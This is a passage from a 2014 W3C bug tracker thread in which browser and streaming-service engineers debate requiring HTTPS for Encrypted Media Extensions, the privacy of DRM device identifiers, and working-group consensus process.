> > Further, I certainly object to the characterization that UAs have an onus to
> > "make sites use it".
> 
> I don't believe I said that. I said the onus on UAs is to 'provide viable
> solutions'. The only alternative to viable solutions in UAs is plugins and
> failing that, native apps.

It's quite clear what you said. UAs have an onus to provide viable solutions in order that sites will use it. If UAs don't provide viable solutions, sites won't use it. However, both statements presume that the goal is that sites use EME. No, the goal of UAs is that they preserve the minimum of user privacy and, where such privacy is insufficient (as is the use of HTTP cookies), that they continue to work to improve the status quo in existing specs, and ensure they don't repeat the same mistakes in new specs.

> Again, as far as I understand it, there is no reason from our side that CDMs
> integrated with desktop UAs should introduce tracking concerns that are
> worse than cookies - at least for the basic level of robustness expected for
> desktop browsers.

That's clearly not true from at least two vendors' solutions, nor is it required in the spec, nor does the spec currently make a distinction as to the robustness requirements for different platforms or form factors (e.g. desktop vs mobile). It's also clear that content providers do not share that view - as you know, several content providers require that the device ID "not" be trivially copiable between machines for that CDM solution to be acceptable.

Rather, the spec steers rather far away from such robustness requirements, precisely because these differ on a content provider by content provider basis and, for many content providers, vary studio by studio, and in ways that cannot be shared or discussed publicly (as has been suggested in the past)

Since you're now introducing a gradient to the discussion - that different platforms (or, as is more likely, different _content_, such as SD vs HD) have different robustness requirements - are you suggesting that the spec should normatively introduce these differences, as well as normatively require how the different requirements are met. For example, for "Desktop", a CDM MUST NOT introduce any more privacy bits than that afforded by the User-Agent String (e.g. for users on the same OS and UA, any identifiers will be identical among all users with that OS+UA), whereas for "High Def" content, if a CDM attests to a unique device identifier (per-origin or otherwise), it MUST be served over a secure transport. Is that a solution that you consider viable?

> Well, this is your call if you really think EME over HTTP is worse that
> plugins over HTTP.

Or, as you like to state, it's as bad as plugins over HTTP. And plugins are horrible for user security and privacy, as has been repeatedly shown for the past decade, and for which UAs are absolutely working on communicating that risk - and the concerns - to users.

> You're of course free to cut off support for parts of the web in your
> browser, if you consider those parts too dangerous for your users. You could
> have disabled Silverlight last year or the year before, but you didn't. What
> changed ? The security / privacy properties of Silverlight ? No, the
> availability of a viable alternative made it possible. This was a good
> thing, no ?

And isn't that the goal of this discussion - to make sure that EME actually meets the bare minimum security and privacy requirements of 2014, rather than barely struggling to meet those of 1999? I'm not sure how to take your reasoning here, other than "You can't turn off plugins unless you give us something as privacy-hostile as plugins", which is of course false. If the alternative is as bad as the problem, then clearly some new solution will be found by UAs.

> The repeated suggestion that we do not care about user privacy or security
> is, frankly, quite tiresome. This whole effort, over the last four years on
> my part, has been about migrating from the wild west of plugins to a model
> where this functionality is provided by User Agent implementors and so,
> amongst other important things, privacy and security are in the User Agent
> implementors' hands. And in practice this has already been achieved for
> desktop IE, Safari, Chrome and in due course I expect for Firefox, all over
> HTTP and with the User Agent implementors fully aware of the privacy
> properties. It's hugely disappointing to see this jeopardised just as it's
> coming to fruition. 

It's clear that you don't care to the same degree we do, or value it to the same degree we do, otherwise this discussion would be moot. Nor is anything being jeopardized - EME continues to progress, and the deficiencies in the spec with regards to privacy and security are slowly being addressed, although in ways that some are not happy with.

> An open standardization process is not only about documenting interoperable
> behavior - a private group of UA implementors could do that on their own
> with much less overhead. It's about committing to take seriously the
> concerns of multiple stakeholders, to keep on working until there is
> consensus, and in deference to the value that brings a willingness to accept
> consensus-based outcomes.

I suspect you're far more optimistic about the W3C process than how it works. A spec that fails to take in the concerns of UAs, regardless of how much consensus it has among non-UAs, is a spec that isn't implemented. This has been the case time and time again in a variety of SDOs, but can be trivially seen with both XHTML and HTML5.

I definitely balk at the suggestion that UAs can't or shouldn't protect user privacy simply because it's expensive for certain entrenched players. UAs can, must, and will take the privacy concerns as paramount (as they should). I think we can and should continue to explore solutions for addressing the concerns being discussed, and hopefully the W3C will provide a venue for site operators such as yourself and UA vendors such as us to express the concerns and understand the solutions.

But let's not mistakenly presume that the spec has primacy. Again, and as you've seen from multiple vendors (Mozilla, Apple, and Microsoft all included), if a spec fails to meaningful address the security concerns, UAs will take appropriate steps. Sometimes that means not implementing a spec at all, sometimes it means disabling certain features (as was seen with third-party cookies), and sometimes it means placing requirements above and beyond what the spec requires, since the spec itself fails to take into consideration user security.

Since we know there is interest in UAs to implement, and we know there's interest in sites to use, let's try to find workable, normative requirements for EME that can meaningfully address the risks that have been identified. If this means normatively specifying robustness requirements, let's have that discussion. But if workable solutions aren't being put forth - and from this bug, they really aren't - then we're going to be "stuck" with at least a bare minimum of requiring a secure top-level document origin.
Comment 113 Jerry Smith 2014-10-27 17:40:46 UTC
It's difficult for me to see how a cryptographically secured identifier imposes a higher risk of identity tracking compared to cookies in general.  If anything, the steps required to retrieve the CDM identifier make it more difficult to abuse and less likely to be exploited.  Browsers can further implement features to reset this identifier, and can allow users to disable the identifier in general, though with loss of EME functionality.

I agree with comments in this bug about reverting this change.  The conversation hadn't been concluded, and the consensus in the working group (if there was one) seemed to be opposition.  I don't believe it is our process to implement a controversial change and then debate whether it should be retained or not, especially following open discussion that did not support it.
Comment 114 Ryan Sleevi 2014-10-27 18:09:50 UTC
(In reply to Jerry Smith from comment #113)
> It's difficult for me to see how a cryptographically secured identifier
> imposes a higher risk of identity tracking compared to cookies in general. 

1) As you no doubt are quite familiar with, the introduction of cryptography into an ecosystem creates a new set of legal expectations and rights for users with respect to privacy preserving decisions. For example, in the US, there's the DMCA that restricts what actions a user can take, restrictions which do not intrinsically apply to cookies the same way.

2) As discussed, even if the minimum was "equivalent to cookies" (which is a meme that is factually and demonstrably false, especially with respect to the normative requirements of the spec), as has been discussed, cookies themselves are NOT an acceptable level of security/privacy in 2014. This can be trivially seen ( http://www.washingtonpost.com/blogs/the-switch/wp/2013/12/10/nsa-uses-google-cookies-to-pinpoint-targets-for-hacking/ )

> If anything, the steps required to retrieve the CDM identifier make it more
> difficult to abuse and less likely to be exploited. 

Are you suggesting that these steps are normatively required?

If not, then it's failing to address the fundamental issue of the spec, and instead relying on the good will and good behaviour and intention of media companies, ISPs, user agents, which is an idealistic vision that has no basis in reality, as demonstrated by abundant evidence in this bug and related threads.

> Browsers can further
> implement features to reset this identifier, and can allow users to disable
> the identifier in general, though with loss of EME functionality.

Surely you don't mean to argue that it's meeting the priority of constituencies to suggest that privacy and functionality should be mutually exclusive for users, because meaningful user privacy is seen as financially troublesome for some site operators?

That is, we have a clear proposal that can trivially meet many (but understandably, not all) privacy goals for users, in a way that doesn't require them to be functionally limited as an intrinsic property.

> I agree with comments in this bug about reverting this change.  The
> conversation hadn't been concluded, and the consensus in the working group
> (if there was one) seemed to be opposition.  I don't believe it is our
> process to implement a controversial change and then debate whether it
> should be retained or not, especially following open discussion that did not
> support it.

There is clearly a shared sentiment by the W3C TAG, extensive contributions from the community, and from UAs that there exist real and meaningful privacy concerns. Comment #48 and Comment #70 collect just a small fraction of these concerns. So yes, these are concerns that MUST be addressed if this spec is to progress.

Currently, we have at least one concrete proposal to address - by normatively requiring TLS. We can continue the discussion and look at other normative requirements to address both the set of privacy concerns yet unaddressed, as well as the introduction of normative requirements of CDMs that might alternatively address the concerns regarding CDMs and privacy. However, there's clear consensus that "doing nothing" is not acceptable, so doing nothing only serves to show the broader community either that a) the WG is not taking privacy seriously or b) that members are hoping to delay such requirements past the point of implementing, such that it becomes unviable in the market for any UA to prioritize user privacy. No one is suggesting the current text is final - but the current text does more to meaningfully move to addressing the concerns than nothing, so that's surely a step in the right direction.
Comment 115 Glenn Adams 2014-10-27 19:46:16 UTC
(In reply to Ryan Sleevi from comment #114)
> There is clearly a shared sentiment by the W3C TAG, extensive contributions
> from the community, and from UAs that there exist real and meaningful
> privacy concerns. Comment #48 and Comment #70 collect just a small fraction
> of these concerns. So yes, these are concerns that MUST be addressed if this
> spec is to progress.

It is up to the WG to decide "what" must be addressed, and "how" a concern is addressed. It is not a requirement that every concern be resolved. An acceptable resolution the WG may conclude could be WONTFIX or LATER.

Simply because it is a sentiment of the TAG does not require that the WG concur.

> However, there's clear consensus that "doing nothing" is not acceptable..

Since there has been no CfC to the TF or WG on this point, then it is premature to suggest what is acceptable or not.
Comment 116 Joe Steele 2014-10-28 02:54:12 UTC
I don't believe it is useful to continue the conversation until this change is reverted. It would be worth spending my time to come up with a better solution only if there were some guarantee that that solution would at least be be considered. By forcing controversial changes in without consensus, my confidence that any proposals I might make will be considered has been sorely shaken.
Comment 117 David Dorwin 2014-10-29 01:01:11 UTC
(In reply to Ryan Sleevi from comment #112)
> (In reply to Mark Watson from comment #111)

> > The repeated suggestion that we do not care about user privacy or security
> > is, frankly, quite tiresome. This whole effort, over the last four years on
> > my part, has been about migrating from the wild west of plugins to a model
> > where this functionality is provided by User Agent implementors and so,

While some desktop implementations are better than plugins, that doesn’t mean the spec or implementations are at a level appropriate for the web platform. Other clients will be exposing functionality to the drive-by-web that was previously only available to native installed apps. With only three implementations, all on desktop browsers, there are already questions whether adequate privacy and security precautions have been taken. That demonstrates that there is reason to be concerned, especially as EME is implemented in more user agents on more platforms.

One DRM vendor has said “I don’t believe you can have DRM without an exchange of PII. That is the nature of DRM.” [1] There is clearly a record of privacy issues that need to be addressed before DRM is exposed to the web without plugins.

> > amongst other important things, privacy and security are in the User Agent
> > implementors' hands. And in practice this has already been achieved for
> > desktop IE, Safari, Chrome and in due course I expect for Firefox, all over

You argue that because these browsers have implemented EME over HTTP that this must be okay. Yet, it is clear that if any of those browsers had chosen to require a secure origin, they would not be supported via HTML5 by Netflix and others [2].

> > HTTP
>> and with the User Agent implementors fully aware of the privacy
> > properties.

Comment #113 calls this logic into question, or at least shows there are disagreements about the privacy properties. 

>> It's hugely disappointing to see this jeopardised just as it's
> > coming to fruition. 
> 
> It's clear that you don't care to the same degree we do, or value it to the
> same degree we do, otherwise this discussion would be moot. Nor is anything
> being jeopardized - EME continues to progress, and the deficiencies in the
> spec with regards to privacy and security are slowly being addressed,
> although in ways that some are not happy with.

Seconding this, it’s hard to argue that you care about these things when most of the effort so far has been to deny that the problems exist [3], discredit the TAG’s analysis [4], and restrict analysis to a small subset of implementations [5] rather than finding ways to solve them.

When people opposed the W3C working on EME, you touted improved security and privacy, including from W3C review [6] and said that “EME is about *constraining* DRM on the web and subjecting it to more public, open, privacy and security review” and referred to “W3C supervision” [7]. However, now that we have such review and it is incompatible with your desires, you and others reject it.

> > An open standardization process is not only about documenting interoperable
> > behavior - a private group of UA implementors could do that on their own
> > with much less overhead. It's about committing to take seriously the
> > concerns of multiple stakeholders, to keep on working until there is
> > consensus, and in deference to the value that brings a willingness to accept
> > consensus-based outcomes.

It’s also not about documenting behavior of existing implementations regardless of the security, privacy, and interoperability properties. UA-DRM vendor pairs could also do that on their own and tell content providers how to write applications for their solution. It is about committing to take seriously the security and privacy of users and to maintain the one web platform. That is why we are at the W3C, getting the kind of supervision you alluded to in [7].

[1] http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0087.html
[2] “browsers who choose to support only HTTPS will find their customers either still using plugins, or cut off from services - a different kind of fragmentation of the web.” - http://lists.w3.org/Archives/Public/www-tag/2014Oct/0096.html
[3] i.e. http://lists.w3.org/Archives/Public/www-tag/2014Oct/0081.html
[4] i.e. Comment #103, Comment #107
[5] i.e. Comment #111
[6] http://lists.w3.org/Archives/Public/public-restrictedmedia/2013Oct/0034.html
[7] http://lists.w3.org/Archives/Public/public-restrictedmedia/2013Aug/0036.html
Comment 118 David Dorwin 2014-10-29 01:02:52 UTC
(In reply to Joe Steele from comment #116)
> I don't believe it is useful to continue the conversation until this change
> is reverted. It would be worth spending my time to come up with a better
> solution only if there were some guarantee that that solution would at least
> be be considered. By forcing controversial changes in without consensus, my
> confidence that any proposals I might make will be considered has been
> sorely shaken.

I'm not sure why you feel your solution would not be considered. I have been asking for proposals for months (i.e comment #63) and reiterated this when I made the change (comment #92). It's ironic that people are threatening not to contribute to improving the spec until this change is reverted - it was the lack of constructive contributions that left us with this as the only concrete proposal. I continue to be willing to consider proposals for normative solutions or ways to reduce the impact on content providers.

However, I am concerned that it is not worth any of our time working on a spec that will never progress because a small minority without alternative solutions can block important security, privacy, and interoperability improvements necessary for EME to become part of the web platform. At least one browser vendor and the TAG, which includes the Director who considers Formal Objections, have strong objections to the previous lack of this requirement, which may endanger the WG's ability to reach Recommendation. While reverting the text might appease those that oppose requiring a secure origin and threaten not to participate, it would show a lack of regard for users and does nothing to move us closer to consensus or a publishable spec. Contributing “specific ideas for addressing the security and/or privacy concerns OR the impact on content providers” that I solicited in comment #92 (and earlier) would do both.
Comment 119 David Dorwin 2014-10-29 01:03:57 UTC
For those of you at TPAC, https://www.w3.org/wiki/TPAC2014/SessionIdeas#Responses_to_Pervasive_Monitoring_and_Secure_Origins sounds relevant.
Comment 120 Joe Steele 2014-10-29 01:27:51 UTC
(In reply to David Dorwin from comment #117)
> (In reply to Ryan Sleevi from comment #112)
> > (In reply to Mark Watson from comment #111)
> One DRM vendor has said “I don’t believe you can have DRM without an
> exchange of PII. That is the nature of DRM.” [1] There is clearly a record
> of privacy issues that need to be addressed before DRM is exposed to the web
> without plugins.

Please give the full context:
"I don’t believe you can have DRM without an exchange of PII. That is the nature of DRM. What you can do is regulate how that PII is exchanged (this is somewhat within the scope of the spec) and how is it handled by the recipients (completely outside the scope of this spec). "

Digital Identity is the bit of PII [1] that most often comes into play here and I think the one most relevant for EME. Since you seem to disagree with the quoted text - please give a counterexample of a DRM for protecting content relevant to EME that does not require any PII.

[1] http://en.wikipedia.org/wiki/Personally_identifiable_information

(In reply to David Dorwin from comment #118)
> (In reply to Joe Steele from comment #116)
> > I don't believe it is useful to continue the conversation until this change
> > is reverted. It would be worth spending my time to come up with a better
> > solution only if there were some guarantee that that solution would at least
> > be be considered. By forcing controversial changes in without consensus, my
> > confidence that any proposals I might make will be considered has been
> > sorely shaken.
> 
> I'm not sure why you feel your solution would not be considered. I have been
> asking for proposals for months (i.e comment #63) and reiterated this when I
> made the change (comment #92). 

I _did_ feel like my proposals would be considered until this. 

If you had prefixed your request for proposals with -- "By the way I am going to make whatever change I feel like if you don't respond within the next day or so" -- I believe you would have gotten a much faster response. 

I agree that this proposal is moving slowly. I think that is a good thing. We want to get it right.
Comment 121 Mark Watson 2014-10-29 02:18:50 UTC
(In reply to David Dorwin from comment #118)
> (In reply to Joe Steele from comment #116)
> > I don't believe it is useful to continue the conversation until this change
> > is reverted. It would be worth spending my time to come up with a better
> > solution only if there were some guarantee that that solution would at least
> > be be considered. By forcing controversial changes in without consensus, my
> > confidence that any proposals I might make will be considered has been
> > sorely shaken.
> 
> I'm not sure why you feel your solution would not be considered. I have been
> asking for proposals for months (i.e comment #63) and reiterated this when I
> made the change (comment #92). It's ironic that people are threatening not
> to contribute to improving the spec until this change is reverted - it was
> the lack of constructive contributions that left us with this as the only
> concrete proposal. I continue to be willing to consider proposals for
> normative solutions or ways to reduce the impact on content providers.
> 
> However, I am concerned that it is not worth any of our time working on a
> spec that will never progress because a small minority without alternative
> solutions can block important security, privacy, and interoperability
> improvements necessary for EME to become part of the web platform. At least
> one browser vendor and the TAG, which includes the Director who considers
> Formal Objections, have strong objections to the previous lack of this
> requirement, which may endanger the WG's ability to reach Recommendation.
> While reverting the text might appease those that oppose requiring a secure
> origin and threaten not to participate, it would show a lack of regard for
> users and does nothing to move us closer to consensus or a publishable spec.
> Contributing “specific ideas for addressing the security and/or privacy
> concerns OR the impact on content providers” that I solicited in comment #92
> (and earlier) would do both.

Reverting the specification has nothing to do with the technical issues, but is about demonstrating a commitment to a process which is ultimately consensus-based and about a basic willingness to work constructively with the other participants.

I don't know where you got the idea this was going slowly. It's a huge issue that was raised only very late in a multi-year process. It's also hugely controversial and controversial issues take time to resolve. A short time ago I committed to provide some data, which had to be gathered and discussed internally. I provided it on Friday, but you hadn't even waited for that.

I take exception to the suggestion that no alternatives have been proposed. I have repeatedly suggested that we work rigorously through the cases and understand the necessity and value of secure origins in each. I might not have proposed alternative text, but there are proposed avenues as yet unexplored.

I'm more than happy to engage on the technical issues once the change is reverted.
Comment 122 Mark Watson 2014-10-29 02:47:24 UTC
(In reply to David Dorwin from comment #117)
> (In reply to Ryan Sleevi from comment #112)
> > (In reply to Mark Watson from comment #111)
> 
> > > The repeated suggestion that we do not care about user privacy or security
> > > is, frankly, quite tiresome. This whole effort, over the last four years on
> > > my part, has been about migrating from the wild west of plugins to a model
> > > where this functionality is provided by User Agent implementors and so,
> 
> While some desktop implementations are better than plugins, that doesn’t
> mean the spec or implementations are at a level appropriate for the web
> platform. Other clients will be exposing functionality to the drive-by-web
> that was previously only available to native installed apps. With only three
> implementations, all on desktop browsers, there are already questions
> whether adequate privacy and security precautions have been taken. That
> demonstrates that there is reason to be concerned, especially as EME is
> implemented in more user agents on more platforms.

I don't disagree with any of the above. However, if you don't trust user agents to take sufficient precautions for user security and privacy you have bigger problems, surely.

> 
> > > amongst other important things, privacy and security are in the User Agent
> > > implementors' hands. And in practice this has already been achieved for
> > > desktop IE, Safari, Chrome and in due course I expect for Firefox, all over
> 
> You argue that because these browsers have implemented EME over HTTP that
> this must be okay. Yet, it is clear that if any of those browsers had chosen
> to require a secure origin, they would not be supported via HTML5 by Netflix
> and others [2].

This has been a 3-year project during which we've made significant changes to our service to accomadate HTTP-specific privacy concerns raised by browsers. I think if the secure origin requirement had been known from the beginning we would be in a different place.

But, yes, browsers are free to disable services they feel are unsafe, whether that is by disabling plugins, which could have been done at any time, or by disabling any other functionality on which in-the-field services depend.

> 
> > > HTTP
> >> and with the User Agent implementors fully aware of the privacy
> > > properties.
> 
> Comment #113 calls this logic into question, or at least shows there are
> disagreements about the privacy properties.

Whilst I don't agree with your characterization of Jerry's comment, I agree there are disagreements. That's why we need to continue the discussion so that at least we are all on the same page with the facts. Indeed digging more rigorously into the specific cases and properties is exactly what I have been suggesting.

> 
> >> It's hugely disappointing to see this jeopardised just as it's
> > > coming to fruition. 
> > 
> > It's clear that you don't care to the same degree we do, or value it to the
> > same degree we do, otherwise this discussion would be moot. Nor is anything
> > being jeopardized - EME continues to progress, and the deficiencies in the
> > spec with regards to privacy and security are slowly being addressed,
> > although in ways that some are not happy with.
> 
> Seconding this, it’s hard to argue that you care about these things when
> most of the effort so far has been to deny that the problems exist [3],

No, I said that the system could be designed so that the privacy properties were not worse than cookies. I think that's correct. It suggests that HTTPS is not required _in all cases_, not that there is no problem.

> discredit the TAG’s analysis [4],

Comment #107 was entirely factual.

> and restrict analysis to a small subset of
> implementations [5] rather than finding ways to solve them.

Again, I think your expectations as to the speed of this process are unreasonable. There is no objection on my part to diggging deeper into the problem. We invested in collecting data to inform the discussion.

> 
> When people opposed the W3C working on EME, you touted improved security and
> privacy, including from W3C review [6] and said that “EME is about
> *constraining* DRM on the web and subjecting it to more public, open,
> privacy and security review” and referred to “W3C supervision” [7]. However,
> now that we have such review and it is incompatible with your desires, you
> and others reject it.

I stand by all those statements. The solution we have in the field is a major improvement over what we had before. It's taken us 3-4 years of work to get there. I understand you want to go further, but I'm arguing that is not possible overnight.

I haven't rejected the TAG's review at all, I just disagree with your interpretation of it. As I said, it asks that to the extent the issues cannot otherwise be mitigated we should require a secure origin. I'm arguing that it's important to figure out how the issues can otherwise be mitigated because a secure origin is not a viable solution in the short term (unless the sub-resource integrity thing can be made to work, that is).

> 
> > > An open standardization process is not only about documenting interoperable
> > > behavior - a private group of UA implementors could do that on their own
> > > with much less overhead. It's about committing to take seriously the
> > > concerns of multiple stakeholders, to keep on working until there is
> > > consensus, and in deference to the value that brings a willingness to accept
> > > consensus-based outcomes.
> 
> It’s also not about documenting behavior of existing implementations
> regardless of the security, privacy, and interoperability properties. UA-DRM
> vendor pairs could also do that on their own and tell content providers how
> to write applications for their solution. It is about committing to take
> seriously the security and privacy of users and to maintain the one web
> platform. That is why we are at the W3C, getting the kind of supervision you
> alluded to in [7].

I agree. So, since we seem to be saying the same thing, why don't we all commit to take seriously the issues raised by the other participants and to invest in discussing those until we get to a resolution ? You could demonstrate that commitment by reverting the change.

> 
> [1] http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0087.html
> [2] “browsers who choose to support only HTTPS will find their customers
> either still using plugins, or cut off from services - a different kind of
> fragmentation of the web.” -
> http://lists.w3.org/Archives/Public/www-tag/2014Oct/0096.html
> [3] i.e. http://lists.w3.org/Archives/Public/www-tag/2014Oct/0081.html
> [4] i.e. Comment #103, Comment #107
> [5] i.e. Comment #111
> [6]
> http://lists.w3.org/Archives/Public/public-restrictedmedia/2013Oct/0034.html
> [7]
> http://lists.w3.org/Archives/Public/public-restrictedmedia/2013Aug/0036.html
Comment 123 Henri Sivonen 2014-10-29 13:50:10 UTC
Ryan has been provoking me on Twitter about this topic. He wins in the sense of succeeding at getting me to say more here.

First of all, as has been pointed out in the www-tag thread, if one vendor restricts EME to https and others don't, the vendor who restricts EME to https is at a considerable competitive disadvantage when it comes to compatibility with video services, which means that requiring https conditionally depending on the characteristics of the key system or the CDM it's not a solution that's actually going to work.

Mozilla has been down the road of putting the righteous aspirations shared by Google to practice while Google allowed them to remain mere aspirations and attempts to "signal" to the industry (http://blog.chromium.org/2011/01/html-video-codec-support-in-chrome.html). While Google has been "signaling", Chrome has been enjoying the compatibility benefits of supporting H.264 and Firefox has lost users to Chrome.

With that background, I hope it's understandable that I'm not jumping at the opportunity to make Firefox ship with EME restricted to https, when Chrome, IE and Safari are shipping (some prefix snapshot of) EME without such a restriction and would enjoy the competitive compatibility benefits if Firefox made it harder for sites to become compatible with Firefox+Access. (It's tough enough that EME-style DRM involves the sites having to operate a different key server for each browser when each browser is associated with a different key system.)

I'm sure that despite tweets like https://twitter.com/sleevi_/status/526783956264316928 Ryan is well familiar with the dynamics described at https://freedom-to-tinker.com/blog/jbonneau/poodle-and-the-fundamental-market-failure-of-browser-security/ . If the conflict between compatibility and security was not real, browsers, Chrome included, would have disabled SSLv3 proactively without having to wait for POODLE to give a push to merely express hope to do so. Whereas SSLv3 may be a long-tail issue (and *still* didn't get proactively disabled), EME has relevant to popular services, so the situation is even worse than with SSLv3.

If the idea is to just get me to say that https-only is the righteous *goal* but no one is actually expected to ship a browser that way in the near term, as https://twitter.com/sleevi_/status/527007790150070272 suggests, I think it's a problem to pat ourselves on the back for signaling an https-only future when not actually addressing the privacy problems in the http-allowing reality that everyone is going to ship.

Since I care about the privacy properties of EME in general and EME-in-Firefox in particular and I expect Chrome, IE and Safari to keep shipping without an https-only restriction, I think it's not good enough to to say that the spec restricting things to https only mitigates the privacy problems if https-only isn't actually what gets shipped. This is why I'm interested in finding ways to address the privacy issues without https, even though in principle, it's not cool to try engineer for https avoidance and it's not good to be seen as trying to engineer for https avoidance. I then want to (try to at least) push those mitigations to be real in what Mozilla ships. I also hope that documenting solutions that don't require https in the spec helps improve the situation for users of other browsers, too.

Is worth noting that restricting EME to https origins is not a silver bullet. In particular, it doesn't address privacy problems related to what the site at the other end of the TLS pipe learns. That is, mandating https does not remove all the problems that affect permanent Web-exposed unique identifier poses.

Also, restricting EME to https origins the way Chrome has restricted Web Crypto to https origins—i.e. requiring the origin that calls the API to be an https origin—is not good enough to address the concerns that Ryan raises in https://twitter.com/sleevi_/status/526586427656507394 and in https://www.w3.org/Bugs/Public/show_bug.cgi?id=26332#c114 . The MITM would inject an https iframe into http pages such that the https iframe loads from a MITM-controlled server that has a legitimately obtained certificate and serves a JS app to talk with a MITM-controlled key server that sees the identifier exposed by the key system. To make the DRM identifiers unavailable to an active MITM (unless the MITM forges certificates), the https-only restriction must apply to all origins in the whole chain of browsing context from the browsing context using EME to the top-level browsing context. In other words, https://dvcs.w3.org/hg/html-media/rev/896eb33b68a2 does not actually address the threats that Ryan has brought forward.

On the other hand, if the spec required the sort of identifier and associated storage partitioning that Mozilla is on track implementing, i.e. partitioning by all of:
 1) Device-unique bits.
 2) The origin using EME.
 3) The origin of the top-level browsing context.
 4) A randomly-generated salt associated with the pair of #2 and #3
and persisted until the user requests the salt be forgotten.)
...node locking would still be accomplished thanks to #1, but tracking across sites would be prevented and the user would have the opportunity to cause a discontinuity in tracking on a particular site.

If the spec further required the key system to encrypt messages such that the identifier is only visible to the key server, in terms of the id exposure, the result would be close (equivalent even?) to the https case (as currently written without the requirement for the whole browsing context path to the top-level to be https-only) as far as the threat of a key server-operating active MITM who injects EME-using iframes that connect to the MITM-operated key server goes.

Still, this leaves the question of what to do about such a MITM being able to surveil the user over time by always injecting the EME usage to a particular (so as not to be tripped up by the partitioning by the origin of the top-level browsing context) commonly-accessed http site (perhaps to reassociate dynamic IP numbers with a persistent identity). As far as I can tell, this could be addressed by partitioning the identity on the temporal axis automatically instead of only when the user requests the salt to be forgotten. This should be logically possible to the extent EME is used for streaming and for short-term off-line-rental implemented using licenses valid for the rental period and media data cached by a Service Worker.

What problems (besides the overhead of reinvidualization) do DRM vendors and service operators see with automatic temporal partitioning of the CDM identity?

The obvious problem I see with the efficacy of this kind of solution is that if the CDM identity renews automatically from time to time but the browser doesn't drop all site-specific data at the same time (and doing so automatically would be impractical), various client-side storage mechanisms could be used to correlate the old and new CDM identities in a manner analogous to cookie resurrection.

P.S. Regarding cookie equivalence: If cookies were designed today, they'd be at minimum origin-scoped and possible https-only. Arguing mere cookie equilavence risks falling into the pattern that DJB characterizes as arguing against encrypting SNI because DNS traffic is unencrypted and arguing against encrypting DNS traffic because SNI is unencrypted.
Comment 124 Anne 2014-10-29 19:28:55 UTC
So it seems the problem we have is that the majority of implementations are shipping without requiring TLS. We could require TLS in the specification, but if the reality is that implementations do not require TLS, we might lose out on requiring things that make sense in a non-TLS world.

Now that we require TLS, how likely is it that existing implementations will change? I doubt new implementations will take the plunge given that EME compatibility is complicated enough.

Now that we require TLS, how likely is it that existing implementations will address non-TLS security and privacy concerns?

I'm all for requiring TLS, but in what timeframe can we move the implementations there? And how do we protect users meanwhile?
Comment 125 Anne 2014-10-29 21:51:48 UTC
Here's a proposal.

1) We work out how to make non-TLS EME as good as possible for end users and if UAs opt to support non-TLS (as everyone does at this point) they steer towards implementing those requirements.

2) We deprecate non-TLS EME in the specification and recommend against supporting it.

3) We set a date one or two years from now at a point when at least two UAs are willing to disable non-TLS EME.

4) We advertize this date through console warnings, evangelism, and perhaps even the specification.

This plan is similar to what has been proposed for WebRTC and geolocation and seems reasonable given existing non-TLS deployment.

(We also make sure to not fall in this non-TLS trap again for new APIs.)
Comment 126 Henri Sivonen 2014-10-30 09:55:32 UTC
I'm still getting one-liner provocations on Twitter instead of a reply here. It seems the main issue is a lack of a clear enough endorsement of https on my part. So:

Restricting EME to https-only in the sense of the origin using EME and the origins of the ancestor browsing contexts being https origins only would be a significant improvement to the Key System-independent privacy characteristics of EME. (As noted, you fall short of the goals if the ancestor chain isn't part of the restriction.) If Microsoft and Google (the browser vendors who we have to thank for the existence of EME and who are prominent DRM vendors in addition to being browser vendors and, therefore, in a particularly strong position when it come to EME) actually shipped that way, that would be awesome assuming there are no non-EME ways to do identifier-exposing DRM e.g. via ActiveX, NPAPI or Pepper plug-ins that MITMs could poke instead.

I think exposing a permanent or origin-independent identifier to the other end of the TLS pipe would be a problem still, so I still think Mozilla-style partitioning of the CDM identity should be recommended even with https.

As long as the https requirement is a dead letter of the spec and Microsoft and Google actually ship with http permitted, users need other privacy solutions. I think an https goal should not be allowed as an excuse not to recommend how equivalent or almost equivalent privacy properties could be achieved on the Key System layer.
Comment 127 David Dorwin 2014-10-30 16:57:30 UTC
(In reply to Henri Sivonen from comment #123)

Putting user agents that do the right thing for their users at a disadvantage is definitely something we want to avoid. I raised this concern in the last paragraph of comment #0 as well as later.

Anne's proposal in comment #125 seems like a reasonable approach to avoid this. As Domenic noted in http://lists.w3.org/Archives/Public/www-tag/2014Oct/0100.html, this could even be testable ahead of time.

> Since I care about the privacy properties of EME in general and
> EME-in-Firefox in particular and I expect Chrome, IE and Safari to keep
> shipping without an https-only restriction, I think it's not good enough to
> to say that the spec restricting things to https only mitigates the privacy
> problems if https-only isn't actually what gets shipped. This is why I'm
> interested in finding ways to address the privacy issues without https, even
> though in principle, it's not cool to try engineer for https avoidance and
> it's not good to be seen as trying to engineer for https avoidance. I then
> want to (try to at least) push those mitigations to be real in what Mozilla
> ships. I also hope that documenting solutions that don't require https in
> the spec helps improve the situation for users of other browsers, too.

I expect that these user agents will follow the entire spec when they update their implementations to a future version of this spec. The same would apply to any other mitigations added to the spec.

I agree that we should work to address privacy and security issues in other ways as well. I welcome input and proposed text on other solutions/mitigations. There are some open bugs on these issues, but feel free to open others.

> Is worth noting that restricting EME to https origins is not a silver
> bullet. In particular, it doesn't address privacy problems related to what
> the site at the other end of the TLS pipe learns. That is, mandating https
> does not remove all the problems that affect permanent Web-exposed unique
> identifier poses.

Agreed. We should address these issues as well. Bug 27165 and bug 27166 cover similar issues.

> Also, restricting EME to https origins the way Chrome has restricted Web
> Crypto to https origins—i.e. requiring the origin that calls the API to be
> an https origin—is not good enough to address the concerns that Ryan raises
> in https://twitter.com/sleevi_/status/526586427656507394 and in
> https://www.w3.org/Bugs/Public/show_bug.cgi?id=26332#c114 . The MITM would
> inject an https iframe into http pages such that the https iframe loads from
> a MITM-controlled server that has a legitimately obtained certificate and
> serves a JS app to talk with a MITM-controlled key server that sees the
> identifier exposed by the key system. To make the DRM identifiers
> unavailable to an active MITM (unless the MITM forges certificates), the
> https-only restriction must apply to all origins in the whole chain of
> browsing context from the browsing context using EME to the top-level
> browsing context. In other words,
> https://dvcs.w3.org/hg/html-media/rev/896eb33b68a2 does not actually address
> the threats that Ryan has brought forward.

Do you have a proposal for how to modify the existing text to address this concern?

> On the other hand, if the spec required the sort of identifier and
> associated storage partitioning that Mozilla is on track implementing, i.e.
> partitioning by all of:
>  1) Device-unique bits.
>  2) The origin using EME.
>  3) The origin of the top-level browsing context.
>  4) A randomly-generated salt associated with the pair of #2 and #3
> and persisted until the user requests the salt be forgotten.)
